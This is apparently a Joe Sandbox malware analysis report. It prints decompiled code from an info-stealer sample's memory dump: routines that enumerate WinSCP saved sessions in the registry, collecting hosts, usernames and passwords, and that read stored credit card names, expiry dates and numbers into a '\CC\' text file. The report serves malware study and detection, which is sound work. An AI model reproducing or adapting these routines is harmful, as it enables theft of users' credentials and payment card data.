                                        0x29d99701
                                        0x29d9970b
                                        0x29d99710
                                        0x29d99713
                                        0x29d99718
                                        0x29d99718
                                        0x29d9971d
                                        0x29d99725
                                        0x29d99726
                                        0x29d9972d
                                        0x29d99733
                                        0x29d99736
                                        0x29d99736
                                        0x29d99741
                                        0x29d99745
                                        0x29d9975b
                                        0x29d99761
                                        0x29d99767
                                        0x29d99775
                                        0x29d9977b
                                        0x29d99780
                                        0x29d99798
                                        0x29d9979e
                                        0x29d997a3
                                        0x29d997b0
                                        0x29d997b6
                                        0x29d997bc
                                        0x29d997c2
                                        0x29d997cb
                                        0x29d997da
                                        0x29d997f2
                                        0x29d997ff
                                        0x29d99823
                                        0x29d99828
                                        0x29d9982b
                                        0x29d99832
                                        0x29d99843
                                        0x29d99845
                                        0x29d99845
                                        0x29d9984b
                                        0x29d99850
                                        0x29d99859
                                        0x29d9991c
                                        0x29d99922
                                        0x29d9992a
                                        0x29d99938
                                        0x29d99944
                                        0x29d99952
                                        0x29d9995e
                                        0x29d99964
                                        0x29d9996c
                                        0x29d9997a
                                        0x29d99986
                                        0x29d9998c
                                        0x29d99994
                                        0x29d9999c
                                        0x29d999a8
                                        0x29d999ae
                                        0x29d999b4
                                        0x00000000
                                        0x29d9985f
                                        0x29d9985f
                                        0x29d99864
                                        0x29d9986d
                                        0x29d99879
                                        0x29d9987f
                                        0x29d99887
                                        0x29d99895
                                        0x29d998a1
                                        0x29d998af
                                        0x29d998bb
                                        0x29d998c1
                                        0x29d998c9
                                        0x29d998d7
                                        0x29d998e3
                                        0x29d998e9
                                        0x29d998f0
                                        0x29d998f8
                                        0x29d99904
                                        0x29d9990a
                                        0x29d99910
                                        0x29d999b5
                                        0x29d999b6
                                        0x29d999bc
                                        0x29d999c8
                                        0x29d999ca
                                        0x29d999ca
                                        0x29d999d2
                                        0x29d999de
                                        0x29d999de
                                        0x29d9986d
                                        0x29d999e4
                                        0x29d999f1
                                        0x29d999f9
                                        0x29d999fa
                                        0x29d999ff
                                        0x29d999ff
                                        0x29d99a09
                                        0x29d99a13
                                        0x29d99a1d
                                        0x29d99a24
                                        0x29d99a2a
                                        0x29d99a2d
                                        0x29d997c2
                                        0x29d997bc
                                        0x29d99a36
                                        0x29d99a3d
                                        0x29d99a4d
                                        0x29d99a53
                                        0x29d99a5d
                                        0x29d99a66
                                        0x29d99a6e
                                        0x29d99a6f
                                        0x29d99a7d

                                        APIs
                                        • _memset.LIBCMT ref: 29D996D9
                                        • lstrcatA.KERNEL32(?,015A1F98,D9555F04,?,?), ref: 29D996EF
                                        • _malloc.LIBCMT ref: 29D996F7
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D99704
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D99718
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9972D
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D99745
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9975B
                                        • StrCmpCA.SHLWAPI(?,29DCD617), ref: 29D99851
                                        • StrCmpCA.SHLWAPI(00000000,29DCD617), ref: 29D99865
                                        • lstrcatA.KERNEL32(?,29DCD628), ref: 29D99879
                                        • lstrcatA.KERNEL32(?,015A1A00), ref: 29D99887
                                        • lstrcatA.KERNEL32(?,?), ref: 29D99895
                                        • lstrcatA.KERNEL32(?,29DCFC3C), ref: 29D998A1
                                        • lstrcatA.KERNEL32(?,?), ref: 29D998AF
                                        • lstrcatA.KERNEL32(?,29DCFC40), ref: 29D998BB
                                        • lstrcatA.KERNEL32(?,015A1A10), ref: 29D998C9
                                        • lstrcatA.KERNEL32(?,?), ref: 29D998D7
                                        • lstrcatA.KERNEL32(?,29DCD628), ref: 29D998E3
                                        • lstrcatA.KERNEL32(?,015A1A20), ref: 29D998F0
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D998F8
                                        • lstrcatA.KERNEL32(?,29DCD628), ref: 29D99904
                                        • lstrcatA.KERNEL32(?,015A4B68), ref: 29D999B6
                                        • lstrcatA.KERNEL32(?,?), ref: 29D999D2
                                        • lstrcatA.KERNEL32(?,29DCFC38), ref: 29D999DE
                                        • DeleteFileA.KERNEL32(?), ref: 29D99A5D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File__getptd$AllocateCopyCountDeleteHeapTick_malloc_memset_randwsprintf
                                        • String ID: %s%d
                                        • API String ID: 2973873176-1110647743
                                        • Opcode ID: f6b47a6282c6da553876f1d520a27140851a01a45fc815f2c7e62a32498e4bf7
                                        • Instruction ID: 85186d10f8808acaae9e03bb91c9da687205533d84937aef4c48574e484c08c2
                                        • Opcode Fuzzy Hash: f6b47a6282c6da553876f1d520a27140851a01a45fc815f2c7e62a32498e4bf7
                                        • Instruction Fuzzy Hash: CCA14FB2541258ABD712AB54DC88FDEB7B8FF59B01F008198F509D2240EB389A45EF75
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9DA30 Relevance: 59.9, APIs: 31, Strings: 3, Instructions: 413stringregistryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 65%
                                        			E29D9DA30(CHAR* __ecx) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v283;
				char _v284;
				char _v1308;
				char _v2332;
				char _v3356;
				intOrPtr _v3364;
				int* _v3368;
				char _v3384;
				intOrPtr _v3392;
				int* _v3396;
				int* _v3412;
				intOrPtr _v3420;
				int _v3424;
				int* _v3440;
				intOrPtr _v3448;
				int _v3452;
				int* _v3468;
				intOrPtr _v3476;
				int* _v3480;
				short _v3496;
				intOrPtr _v3504;
				int* _v3508;
				int* _v3524;
				void* _v3528;
				char _v3529;
				int _v3536;
				CHAR* _v3540;
				int _v3544;
				char _v3548;
				char _v3552;
				char _v3556;
				char _v3560;
				char _v3564;
				char _v3568;
				char _v3572;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t135;
				signed int _t136;
				intOrPtr* _t146;
				intOrPtr* _t149;
				intOrPtr* _t156;
				void* _t159;
				CHAR* _t165;
				intOrPtr _t167;
				intOrPtr _t171;
				void* _t172;
				void* _t186;
				int _t189;
				long _t190;
				void* _t193;
				CHAR* _t195;
				CHAR* _t200;
				int* _t213;
				void* _t214;
				intOrPtr _t223;
				void* _t225;
				intOrPtr* _t227;
				intOrPtr* _t246;
				intOrPtr _t247;
				CHAR* _t252;
				CHAR* _t257;
				intOrPtr _t258;
				intOrPtr _t260;
				CHAR* _t261;
				void* _t267;
				void* _t268;
				intOrPtr* _t269;
				intOrPtr* _t270;
				long _t274;
				CHAR* _t278;
				void* _t279;
				signed int _t282;
				void* _t283;
				void* _t288;

				_push(0xffffffff);
				_push(E29DC2F9D);
				_push( *[fs:0x0]);
				_t135 =  *0x29dd5664; // 0xd9555f04
				_t136 = _t135 ^ _t282;
				_v20 = _t136;
				_push(_t136);
				 *[fs:0x0] =  &_v16;
				_t213 = 0;
				_t278 = __ecx;
				_v3540 = __ecx;
				_v3544 = 0;
				_v284 = 0;
				E29DB5640( &_v283, 0, 0x103);
				_v3536 = 0x104;
				E29DB5640( &_v2332, 0, 0x400);
				_t245 =  &_v1308;
				E29DB5640( &_v1308, 0, 0x400);
				E29DB5640( &_v3356, 0, 0x400);
				_t288 = _t283 - 0xde4 + 0x30;
				_v3552 = 0x400;
				_v3564 = 0x400;
				_v3548 = 0x400;
				if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Configuration", 0, 1,  &_v3528) != 0) {
					L43:
					 *[fs:0x0] = _v16;
					_pop(_t267);
					_pop(_t279);
					_pop(_t214);
					return E29DADF46(_t144, _t214, _v20 ^ _t282, _t245, _t267, _t279);
				} else {
					_t246 =  *0x29dd80c0; // 0x15a2ff8
					_t146 = _t246;
					_v3448 = 0xf;
					_v3452 = 0;
					_v3468 = 0;
					_t18 = _t146 + 1; // 0x15a2ff9
					_t268 = _t18;
					do {
						_t223 =  *_t146;
						_t146 = _t146 + 1;
					} while (_t223 != 0);
					E29D892C0( &_v3468, _t246, _t146 - _t268);
					_v8 = 0;
					_t269 =  *0x29dd829c; // 0x15a4568
					_t149 = _t269;
					_v3420 = 0xf;
					_v3424 = 0;
					_v3440 = 0;
					_t24 = _t149 + 1; // 0x15a4569
					_t225 = _t24;
					do {
						_t247 =  *_t149;
						_t149 = _t149 + 1;
					} while (_t247 != 0);
					E29D892C0( &_v3440, _t269, _t149 - _t225);
					_v8 = 1;
					_t270 = E29DA4990( &_v3468,  &_v3440,  &_v3384);
					_v8 = 2;
					_t156 = E29DA4990( &_v3440,  &_v3440,  &_v3496);
					_v8 = 3;
					if( *((intOrPtr*)(_t270 + 0x14)) < 8) {
						_t227 = _t270;
					} else {
						_t227 =  *_t270;
					}
					if( *((intOrPtr*)(_t156 + 0x14)) >= 8) {
						_t156 =  *_t156;
					}
					_v3529 =  *0x29dd8368(_v3528, _t156, _t227, 0x10, _t213,  &_v3560,  &_v3572) != 0;
					if(_v3476 >= 8) {
						_push(_v3496);
						E29DADF3B();
						_t288 = _t288 + 4;
					}
					_t245 = 0;
					_v3476 = 7;
					_v3480 = _t213;
					_v3496 = 0;
					if(_v3364 >= 8) {
						_push(_v3384);
						E29DADF3B();
						_t288 = _t288 + 4;
					}
					_v3364 = 7;
					_v3368 = _t213;
					_v3384 = 0;
					if(_v3420 >= 0x10) {
						_t245 = _v3440;
						_push(_v3440);
						E29DADF3B();
						_t288 = _t288 + 4;
					}
					_v8 = 0xffffffff;
					_v3420 = 0xf;
					_v3424 = _t213;
					_v3440 = _t213;
					if(_v3448 >= 0x10) {
						_push(_v3468);
						E29DADF3B();
						_t288 = _t288 + 4;
					}
					_t159 = _v3528;
					_v3448 = 0xf;
					_v3452 = _t213;
					_v3468 = _t213;
					if(_v3529 == _t213) {
						L21:
						if(_t159 != _t213) {
							RegCloseKey(_t159);
							_v3528 = _t213;
						}
						goto L23;
					} else {
						if(_t159 == _t213) {
							L23:
							if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Sessions", _t213, 9,  &_v3528) != 0) {
								goto L43;
							}
							_t245 =  &_v3536;
							if(RegEnumKeyExA(_v3528, _t213,  &_v284,  &_v3536, _t213, _t213, _t213, _t213) != _t213) {
								L41:
								_t144 = _v3528;
								if(_t144 != _t213) {
									_t144 = RegCloseKey(_t144);
								}
								goto L43;
							} else {
								goto L25;
							}
							do {
								L25:
								lstrcatA(_t278, "\n");
								_t252 =  *0x29dd7c3c; // 0x15a4b98
								lstrcatA(_t278, _t252);
								lstrcatA(_t278, "\n");
								_t165 =  *0x29dd81e0; // 0x15a1a10
								lstrcatA(_t278, _t165);
								_t167 =  *0x29dd7b9c; // 0x15a4bb0
								 *0x29dd8408(_v3528,  &_v284, _t167, 2, _t213,  &_v2332,  &_v3552);
								lstrcatA(_t278,  &_v2332);
								_t171 =  *0x29dd7d00; // 0x15a4538
								_v3556 = 4;
								_t172 =  *0x29dd8408(_v3528,  &_v284, _t171, 0xffff, _t213,  &_v3568,  &_v3556);
								_t306 = _t172;
								if(_t172 != 0) {
									lstrcatA(_t278, ":22");
								} else {
									_t200 = E29DA4720( &_v3384, _t306, _v3568);
									_v8 = 4;
									if(_t200[0x14] >= 0x10) {
										_t200 =  *_t200;
									}
									lstrcatA(_t278, _t200);
									_v8 = 0xffffffff;
									if(_v3364 >= 0x10) {
										_push(_v3384);
										E29DADF3B();
										_t288 = _t288 + 4;
									}
									_v3364 = 0xf;
									_v3368 = 0;
									_v3384 = 0;
									_t213 = 0;
								}
								lstrcatA(_t278, "\n");
								_t257 =  *0x29dd7c9c; // 0x15a1a20
								lstrcatA(_t278, _t257);
								_t258 =  *0x29dd8264; // 0x15a4658
								 *0x29dd8408(_v3528,  &_v284, _t258, 2, _t213,  &_v1308,  &_v3564);
								lstrcatA(_t278,  &_v1308);
								_v3392 = 0xf;
								_v3396 = _t213;
								_v3412 = _t213;
								_v8 = 5;
								_t260 =  *0x29dd7e2c; // 0x15a45b0
								 *0x29dd8408(_v3528,  &_v284, _t260, 2, _t213,  &_v3356,  &_v3548);
								lstrcatA(_t278, "\n");
								_t261 =  *0x29dd819c; // 0x15a4b68
								lstrcatA(_t278, _t261);
								_t186 =  *0x29dd8550( &_v3356, 0x29dcd617);
								_t309 = _t186;
								if(_t186 != 0) {
									_t193 = E29D9D2B0( &_v1308,  &_v3356, _t309,  &_v3524,  &_v2332);
									_v8 = 6;
									E29D891D0(_t193,  &_v3412);
									_v8 = 5;
									if(_v3504 >= 0x10) {
										_push(_v3524);
										E29DADF3B();
										_t288 = _t288 + 4;
									}
									_t195 = _v3412;
									_v3504 = 0xf;
									_v3508 = _t213;
									_v3524 = _t213;
									if(_v3392 < 0x10) {
										_t195 =  &_v3412;
									}
									lstrcatA(_v3540, _t195);
									_t278 = _v3540;
								}
								lstrcatA(_t278, "\n\n");
								_t245 = _v3528;
								_t189 = _v3544 + 1;
								_v3536 = 0x104;
								_v3544 = _t189;
								_t190 = RegEnumKeyExA(_v3528, _t189,  &_v284,  &_v3536, _t213, _t213, _t213, _t213);
								_v8 = 0xffffffff;
								_t274 = _t190;
								if(_v3392 >= 0x10) {
									_push(_v3412);
									E29DADF3B();
									_t288 = _t288 + 4;
								}
								_v3392 = 0xf;
								_v3396 = _t213;
								_v3412 = _t213;
							} while (_t274 != 0x103);
							goto L41;
						}
						RegCloseKey(_t159);
						_t159 = 0;
						_v3528 = 0;
						goto L21;
					}
				}
			}


















































































                                        0x29d9da33
                                        0x29d9da35
                                        0x29d9da40
                                        0x29d9da47
                                        0x29d9da4c
                                        0x29d9da4e
                                        0x29d9da54
                                        0x29d9da58
                                        0x29d9da5e
                                        0x29d9da6b
                                        0x29d9da6f
                                        0x29d9da75
                                        0x29d9da7b
                                        0x29d9da81
                                        0x29d9da97
                                        0x29d9daa1
                                        0x29d9daaa
                                        0x29d9dab2
                                        0x29d9dac3
                                        0x29d9dac8
                                        0x29d9dadf
                                        0x29d9dae5
                                        0x29d9daeb
                                        0x29d9daf9
                                        0x29d9e03d
                                        0x29d9e040
                                        0x29d9e048
                                        0x29d9e049
                                        0x29d9e04a
                                        0x29d9e058
                                        0x29d9daff
                                        0x29d9daff
                                        0x29d9db05
                                        0x29d9db07
                                        0x29d9db11
                                        0x29d9db17
                                        0x29d9db1d
                                        0x29d9db1d
                                        0x29d9db20
                                        0x29d9db20
                                        0x29d9db22
                                        0x29d9db23
                                        0x29d9db31
                                        0x29d9db36
                                        0x29d9db39
                                        0x29d9db3f
                                        0x29d9db41
                                        0x29d9db4b
                                        0x29d9db51
                                        0x29d9db57
                                        0x29d9db57
                                        0x29d9db60
                                        0x29d9db60
                                        0x29d9db62
                                        0x29d9db63
                                        0x29d9db71
                                        0x29d9db83
                                        0x29d9db8c
                                        0x29d9db9b
                                        0x29d9db9f
                                        0x29d9dba9
                                        0x29d9dbb0
                                        0x29d9dbb6
                                        0x29d9dbb2
                                        0x29d9dbb2
                                        0x29d9dbb2
                                        0x29d9dbbb
                                        0x29d9dbbd
                                        0x29d9dbbd
                                        0x29d9dbe6
                                        0x29d9dbf3
                                        0x29d9dbfb
                                        0x29d9dbfc
                                        0x29d9dc01
                                        0x29d9dc01
                                        0x29d9dc04
                                        0x29d9dc06
                                        0x29d9dc10
                                        0x29d9dc16
                                        0x29d9dc23
                                        0x29d9dc2b
                                        0x29d9dc2c
                                        0x29d9dc31
                                        0x29d9dc31
                                        0x29d9dc3b
                                        0x29d9dc45
                                        0x29d9dc4b
                                        0x29d9dc58
                                        0x29d9dc5a
                                        0x29d9dc60
                                        0x29d9dc61
                                        0x29d9dc66
                                        0x29d9dc66
                                        0x29d9dc69
                                        0x29d9dc70
                                        0x29d9dc7a
                                        0x29d9dc80
                                        0x29d9dc8c
                                        0x29d9dc94
                                        0x29d9dc95
                                        0x29d9dc9a
                                        0x29d9dc9a
                                        0x29d9dc9d
                                        0x29d9dca3
                                        0x29d9dcad
                                        0x29d9dcb3
                                        0x29d9dcbf
                                        0x29d9dcd4
                                        0x29d9dcd6
                                        0x29d9dcd9
                                        0x29d9dcdf
                                        0x29d9dcdf
                                        0x00000000
                                        0x29d9dcc1
                                        0x29d9dcc3
                                        0x29d9dce5
                                        0x29d9dd01
                                        0x00000000
                                        0x00000000
                                        0x29d9dd11
                                        0x29d9dd29
                                        0x29d9e02c
                                        0x29d9e02c
                                        0x29d9e034
                                        0x29d9e037
                                        0x29d9e037
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9dd2f
                                        0x29d9dd2f
                                        0x29d9dd35
                                        0x29d9dd3b
                                        0x29d9dd43
                                        0x29d9dd4f
                                        0x29d9dd55
                                        0x29d9dd5c
                                        0x29d9dd62
                                        0x29d9dd87
                                        0x29d9dd95
                                        0x29d9dd9b
                                        0x29d9ddc8
                                        0x29d9ddce
                                        0x29d9ddd4
                                        0x29d9ddd6
                                        0x29d9de41
                                        0x29d9ddd8
                                        0x29d9dde5
                                        0x29d9ddea
                                        0x29d9ddf5
                                        0x29d9ddf7
                                        0x29d9ddf7
                                        0x29d9ddfb
                                        0x29d9de01
                                        0x29d9de0e
                                        0x29d9de16
                                        0x29d9de17
                                        0x29d9de1c
                                        0x29d9de1c
                                        0x29d9de21
                                        0x29d9de2b
                                        0x29d9de31
                                        0x29d9de37
                                        0x29d9de37
                                        0x29d9de4d
                                        0x29d9de53
                                        0x29d9de5b
                                        0x29d9de61
                                        0x29d9de87
                                        0x29d9de95
                                        0x29d9de9b
                                        0x29d9dea5
                                        0x29d9deab
                                        0x29d9dec0
                                        0x29d9dec7
                                        0x29d9dede
                                        0x29d9deea
                                        0x29d9def0
                                        0x29d9def8
                                        0x29d9df0a
                                        0x29d9df10
                                        0x29d9df12
                                        0x29d9df32
                                        0x29d9df3f
                                        0x29d9df43
                                        0x29d9df4d
                                        0x29d9df57
                                        0x29d9df5f
                                        0x29d9df60
                                        0x29d9df65
                                        0x29d9df65
                                        0x29d9df68
                                        0x29d9df6e
                                        0x29d9df78
                                        0x29d9df7e
                                        0x29d9df8a
                                        0x29d9df8c
                                        0x29d9df8c
                                        0x29d9df9a
                                        0x29d9dfa0
                                        0x29d9dfa0
                                        0x29d9dfac
                                        0x29d9dfc3
                                        0x29d9dfcf
                                        0x29d9dfd3
                                        0x29d9dfdd
                                        0x29d9dfe3
                                        0x29d9dfe9
                                        0x29d9dff7
                                        0x29d9dff9
                                        0x29d9e001
                                        0x29d9e002
                                        0x29d9e007
                                        0x29d9e007
                                        0x29d9e00a
                                        0x29d9e014
                                        0x29d9e01a
                                        0x29d9e020
                                        0x00000000
                                        0x29d9dd2f
                                        0x29d9dcc6
                                        0x29d9dccc
                                        0x29d9dcce
                                        0x00000000
                                        0x29d9dcce
                                        0x29d9dcbf

                                        APIs
                                        • _memset.LIBCMT ref: 29D9DA81
                                        • _memset.LIBCMT ref: 29D9DAA1
                                        • _memset.LIBCMT ref: 29D9DAB2
                                        • _memset.LIBCMT ref: 29D9DAC3
                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,01599110), ref: 29D9DAF1
                                        • RegGetValueW.ADVAPI32(?,00000000,00000000,00000010,00000000,?,?,?,?,015A4568,015A4569,015A2FF8,015A2FF9), ref: 29D9DBD9
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DCC6
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DCD9
                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?), ref: 29D9DCF9
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 29D9DD21
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DD35
                                        • lstrcatA.KERNEL32(?,015A4B98,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DD43
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DD4F
                                        • lstrcatA.KERNEL32(?,015A1A10,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DD5C
                                        • RegGetValueA.ADVAPI32(?,?,015A4BB0,00000002,00000000,?,?), ref: 29D9DD87
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DD95
                                        • RegGetValueA.ADVAPI32(?,?,015A4538,0000FFFF,00000000,01599110,?), ref: 29D9DDCE
                                        • lstrcatA.KERNEL32(?,00000000,01599110,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DDFB
                                        • lstrcatA.KERNEL32(?,:22,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DE41
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DE4D
                                        • lstrcatA.KERNEL32(?,015A1A20,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DE5B
                                        • RegGetValueA.ADVAPI32(?,?,015A4658,00000002,00000000,?,00000000), ref: 29D9DE87
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DE95
                                        • RegGetValueA.ADVAPI32(?,?,015A45B0,00000002,00000000,?,?), ref: 29D9DEDE
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DEEA
                                        • lstrcatA.KERNEL32(?,015A4B68,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DEF8
                                        • StrCmpCA.SHLWAPI(?,29DCD617,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DF0A
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DF9A
                                        • lstrcatA.KERNEL32(?,29DCFC38,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9DFAC
                                        • RegEnumKeyExA.ADVAPI32(?,?,?,00000104,00000000,00000000,00000000,00000000), ref: 29D9DFE3
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,01599110,00000000), ref: 29D9E037
                                        Strings
                                        • :22, xrefs: 29D9DE3B
                                        • Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 29D9DCEF
                                        • Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 29D9DAD5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Value$_memset$Close$EnumOpen
                                        • String ID: :22$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions
                                        • API String ID: 4181785608-2123096617
                                        • Opcode ID: 2f50bba644b119c1ed9808e2ccbf4deada8d721323b8c27e24c9891b075e8a56
                                        • Instruction ID: 47665783ee9168bc8982247c8b4938bd4a680f20512770aee2d8f59da8b00d40
                                        • Opcode Fuzzy Hash: 2f50bba644b119c1ed9808e2ccbf4deada8d721323b8c27e24c9891b075e8a56
                                        • Instruction Fuzzy Hash: B1023FB2911259AFDB21EF94DC84FDAB7B9AF58700F0081DAE509A7240DB346E85DF70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D99F90 Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 250stringmemoryfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 48%
                                        			E29D99F90(CHAR* __ecx, intOrPtr __edx, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v284;
				char _v548;
				intOrPtr _v556;
				char _v560;
				char _v576;
				char _v580;
				CHAR* _v584;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr* _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t59;
				CHAR* _t64;
				signed int _t69;
				void* _t79;
				int _t80;
				long _t82;
				void* _t89;
				int _t90;
				CHAR* _t92;
				CHAR* _t93;
				void* _t107;
				CHAR* _t109;
				void* _t112;
				CHAR* _t116;
				void* _t117;
				intOrPtr* _t133;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t160;
				CHAR* _t161;
				intOrPtr _t162;
				void* _t163;
				CHAR* _t164;
				signed int _t165;
				void* _t166;
				void* _t170;
				void* _t172;
				void* _t173;
				void* _t178;
				signed int _t179;

				_push(0xffffffff);
				_push(E29DC32AB);
				_push( *[fs:0x0]);
				_t58 =  *0x29dd5664; // 0xd9555f04
				_t59 = _t58 ^ _t165;
				_t179 = _t59;
				_v20 = _t59;
				_push(_t160);
				_push(_t154);
				_push(_t59);
				 *[fs:0x0] =  &_v16;
				_t116 = _a4;
				_v596 = __edx;
				_v600 = _a8;
				_v584 = __ecx;
				_v592 = _a12;
				_v604 = _a16;
				E29DB5640( &_v284, 0, 0x104);
				_t64 =  *0x29dd8098; // 0x15a1f98
				lstrcatA( &_v284, _t64);
				_t161 = E29DADFE0( &_v284, _t154, _t160, 0x1a);
				 *_t161 = 0;
				E29DAFCE4(GetTickCount());
				_t170 = _t166 - 0x24c + 0x14;
				_t155 = 0x1a;
				do {
					_t69 = E29DAFCF6(_t179);
					asm("cdq");
					_push(_t69 % 0xa);
					_push(_t161);
					wsprintfA(_t161, "%s%d");
					_t170 = _t170 + 0x10;
					_t155 = _t155 - 1;
				} while (_t155 != 0);
				_t161[0x1a] = 0;
				lstrcatA( &_v284, _t161);
				CopyFileA(_t116,  &_v284, 1);
				E29DB5640( &_v548, _t155, 0x104);
				wsprintfA( &_v548, "\\CC\\%s_%s.txt", _v584, _v600);
				_t162 =  *0x29dd7c30; // 0x158fdd0
				_t79 =  *0x29dd8344( &_v284,  &_v588);
				_t172 = _t170 + 0x24;
				if(_t79 != 0) {
					L16:
					_t80 = DeleteFileA( &_v284);
					 *[fs:0x0] = _v16;
					_pop(_t156);
					_pop(_t163);
					_pop(_t117);
					return E29DADF46(_t80, _t117, _v20 ^ _t165,  &_v284, _t156, _t163);
				}
				_t82 =  *0x29dd82f8(_v588, _t162, 0xffffffff,  &_v580, _t79);
				_t173 = _t172 + 0x14;
				if(_t82 != 0) {
					L15:
					 *0x29dd8318(_v580);
					 *0x29dd8348(_v588);
					goto L16;
				}
				_t164 = HeapAlloc(GetProcessHeap(), _t82, 0xf423f);
				_t89 =  *0x29dd8314(_v580);
				_t173 = _t173 + 4;
				if(_t89 != 0x64) {
					L10:
					_t90 = lstrlenA(_t164);
					_t133 = _v604;
					if(_t133 != 0) {
						__eflags =  *_t133 - 2;
						if( *_t133 == 2) {
							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t133 + 4)), _t164,  &_v548, _t90, 3);
						} else {
							 *0x29dd8814 = 0x80000;
						}
					} else {
						 *0x29dd8814 = 0x10000;
					}
					goto L15;
				} else {
					goto L5;
				}
				do {
					L5:
					_t92 =  *0x29dd8334(_v580, 0);
					_t93 =  *0x29dd8334(_v580, 1);
					_v584 =  *0x29dd8334(_v580, 2);
					lstrcatA(_t164, "Name: ");
					lstrcatA(_t164, _t92);
					lstrcatA(_t164, "\n");
					lstrcatA(_t164, "Month: ");
					lstrcatA(_t164, _t93);
					lstrcatA(_t164, "\n");
					lstrcatA(_t164, "Year: ");
					lstrcatA(_t164, _v584);
					lstrcatA(_t164, "\n");
					lstrcatA(_t164, "Card: ");
					_t107 =  *0x29dd8320(_v580, 3, _v596, _v592);
					_t109 = E29D99510( &_v576,  *0x29dd8328(), _t107, _v580, 3);
					_t178 = _t173 + 0x30;
					_v8 = 0;
					if(_t109[0x14] >= 0x10) {
						_t109 =  *_t109;
					}
					lstrcatA(_t164, _t109);
					_v8 = 0xffffffff;
					if(_v556 >= 0x10) {
						_push(_v576);
						E29DADF3B();
						_t178 = _t178 + 4;
					}
					_v556 = 0xf;
					_v560 = 0;
					_v576 = 0;
					lstrcatA(_t164, "\n\n");
					_t112 =  *0x29dd8314(_v580);
					_t173 = _t178 + 4;
				} while (_t112 == 0x64);
				goto L10;
			}





















































                                        0x29d99f93
                                        0x29d99f95
                                        0x29d99fa0
                                        0x29d99fa7
                                        0x29d99fac
                                        0x29d99fac
                                        0x29d99fae
                                        0x29d99fb2
                                        0x29d99fb3
                                        0x29d99fb4
                                        0x29d99fb8
                                        0x29d99fc1
                                        0x29d99fc9
                                        0x29d99fcf
                                        0x29d99fd8
                                        0x29d99fea
